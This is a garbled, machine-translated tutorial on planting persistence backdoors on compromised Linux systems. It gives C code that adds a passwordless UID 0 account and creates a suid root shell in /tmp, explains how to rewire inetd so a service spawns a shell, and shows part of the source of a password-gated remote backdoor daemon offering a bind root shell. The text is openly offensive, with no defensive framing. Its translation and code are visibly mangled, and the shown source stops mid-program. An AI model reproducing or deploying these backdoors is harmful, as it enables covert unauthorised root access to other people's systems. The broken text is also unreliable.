Summary of creating a linux Backdoor

The simplest way is to add an account with a UID of 0 to the passwd password file. But it is best not to do this, because as long as the system administrator checks the password file, it will be missed. The following is a C program that adds a UID0 account to the etcpasswd password file. ++ Backdoorbackdoor1.c # includemain () {FI

Elementary
The simplest method is in the password file.PasswdAdd an account with a UID of 0. But it is best not to do this, because as long as the system administrator checks the password file, it will be "missed. The following is a C program that adds a UID 0 account to the/etc/passwd password file.
<++> Backdoor/backdoor1.c
# INcLude
Main ()
{
FILE * fd;
Fd = fopen ("/etc/passwd", "a + ");
Fprintf (fd, "hax0r: 0: 0:/root:/bin/sh \ n ");
}
<-->

A little more concealed than this method is to change the UID of an unused account hidden in the password file to 0 and set its second domain (password domain) to null. (Note: If you are using a higher version of * nix, you may need to modify the/etc/shadow file .)

Place it in the/tmp directorySuIdShell. In the future, as long as you run this program, you will get the root user permission easily. This method is almost the most popular. However, many systems clear data in the/tmp directory every few hours or every startup. Other systems do not allow suid programs in the/tmp directory. Of course, you can modify or clear these limits by yourself (because you are already the root user and have the permission to modify/var/spool/cron/CrontabS/root and/etc/fstab files ). The following is the C source program for placing the suid shell program in the/tmp directory.

<++> Backdoor/backdoor2.c
# Include
Main ()
{
System ("Cp/Bin/sh/tmp/fid ");
System ("ChownRoot. root/tmp/fid ");
System ("Chmod4755/tmp/fid ");
}
<-->
____________________________________________________________________
Intermediate

Configuration file of the super server daemon (inetd. Generally, the system administrator does not check the file frequently. Therefore, this is a good place to place a "backdoor. So how can we build the best backdoor here? Of course it is remote. In this way, you do not need a local account to become the root user. First, let's take a look at the basic knowledge in this regard: the inetd process is responsible for listening to the connection requests of various TCP and UDP ports, and starting the corresponding server process according to the connection requests. The configuration file/etc/inetd. conf is very simple. The basic form is as follows:

(1) (2) (3) (4) (5) (6) (7)
FtpSTrEam tcp nowait root/usr/etc/ftpd
Talk dgram udp wait root/usr/etc/ntalkd
Mountd/1 stream rpc/tcp wait root/usr/etc/mountd

1: The first column is the service name. The service name is mapped to the port number by querying the/etc/services file (for TCP and UDP services) or the portmap daemon (for RPC services. The RPC (Remote Procedure Call) service is identified by the name format of name/num and the rpc flag in the third column.
2: The second column determines the set of API types used by the Service: stream, dgram, or raw. Generally, stream is used for TCP services, while dgram is used for UDP. raw is rarely used.
3: The third column identifies the communication protocol used by the Service. Allowed types are listed in protocoLsFile. The Protocol is almost always tcp or udp. The RPC service is named rpc/before the protocol type /.
4: if the specified service can process multiple requests at a time (instead of exiting after processing one request), the fourth column should be set to wait, this prevents inetd from continuously deriving new copies of the daemon. This option is used to process a large number of small requests. If wait is not suitable, enter nowait in this field.
5: the username used to run the daemon is displayed in the Fifth Column.
6: The fully qualified path name of the daemon is displayed in column 6.
7: The real name and parameters of the daemon.

If the work to be processed is insignificant (for example, user interaction is not required), the inetd daemon will process it by itself. In this case, you only need to fill in 'internal' in column 6 and column 7. Therefore, to install a convenient backdoor, you can select a service that is not frequently used and use a daemon that can generate a backdoor to replace the original daemon. For example, you can add an account with UID 0 or copy a suid shell.

One of the better methods is to provide the service day of the date and time.TimeReplace with the shell that can generate a suid root. In the/etc/inetd. conf file:

Daytime stream tcp nowait root internal

To:

Daytime stream tcp nowait/bin/sh-I.

Restart the inetd process:

KillAll-9 inetd.

But a better and more concealed method is to forge a network service so that it can provide backdoors, such as password protection, to us even more imperceptible. If you canLnIt would be better to make remote access easily when the etd is connected. The method is to bind the "own" daemon to a port. The program does not provide any prompt for external connections, but you only need to enter the correct password to access the system smoothly. The following is a demonstration program for this backdoor. (Note: This program is not completely written .)

<++> Backdoor/remoteback. c
/* Coders:
Theft

Help from:
Sector9, Halogen

Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen,
Psionic, mongod, Psionic.
Groups: Ethical Mutiny Crew (EMC), Common Purpose hackers (CPH ),
Global Hell (gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup:
# Gcc-o backhore. c #./backdoor password &
Run:
Telnet to the host on port 4000. After connectEdYou
Will not be prompted for a password, this way it isLess
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8.

Distributers:
Ethical Mutiny Crew

*/

# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include


# Define PORT 4000
# Define maxdatasalize 100
# Define BACKLOG 10
# Define SA struct sockaDdR

Void handle (int );

Int
Main (int argc, char * argv [])
{
Int sockfd, new_fd, sin_size, numbytes, cmd;
Char ask [10] = "Command :";
Char * bytes, * buf, pass [40];
Struct sockaddr_in my_addr;

Struct sockaddr_in their_addr;

Printf ("\ n Backhore BETA by Theft \ n ");
Printf ("1: trojans rc. local \ n ");
Printf ("2: sends a systemwide message \ n ");
Printf ("3: binds a root shell on port 2000 \ n ");
Printf ("4: creates suid sh in/tmp \ n ");
Printf ("5: creates mutiny account uid 0 no passwd \ n ");
Printf ("6: drops to suid shell \ n ");
Printf ("7: infoRmAtion on backhore \ n ");
Printf ("8: contact \ n ");

If (argc! = 2 ){
Fprintf (stderr, "Usage: % s password \ n", argv [0]);
ExIt (1 );
}

Strncpy (pass, argv [1], 40 );
Printf (".. using password: % s .. \ n", pass );


If (sockfd = socket (AF_INET, SOCK_STREAM, 0) =-1 ){
Perror ("socket ");
Exit (1 );
}

My_addr.sin_family = AF_INET;
My_addr.sin_port = htons (PORT );
My_addr.sin_addr.s_addr = INADDR_ANY;

If (bind (sockfd, (SA *) & my_addr, sizeof (SA) =-1 ){

Perror ("bind ");
Exit (1 );